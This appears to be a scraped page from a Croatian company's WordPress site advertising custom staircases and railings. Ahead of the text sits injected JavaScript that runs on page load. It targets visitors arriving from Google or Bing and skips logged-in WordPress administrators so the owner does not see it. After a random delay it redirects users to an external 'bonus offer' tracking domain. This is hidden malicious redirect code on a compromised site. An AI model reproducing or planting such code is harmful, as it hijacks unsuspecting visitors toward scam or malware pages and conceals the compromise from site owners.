((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(2000, 6000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();class="post-template-default single single-post postid-751 single-format-standard custom-background wp-custom-logo better-responsive-menu">

Stubišta

Stubište (stepenice) je dio svakog stambenog objekta. Bitno je kvalitetno ga uklopiti u prostor, kako dizajnom, tako i bojom.

Stubište treba biti funkcionalno i sigurno, tako da ograda osim sigurnosti ima i vrlo važnu estetsku ulogu u prostoru. Izgled ograde i odabir materijala najčešće se usklađuje s uređenjem ostatka prostora.

VITA-JELA d.o.o projektira, izrađuje i montira stubišta i ograde prema Vašim potrebama koristeći visoko kvalitetnu sirovinu uz vrhunsku izradu i ugradbu.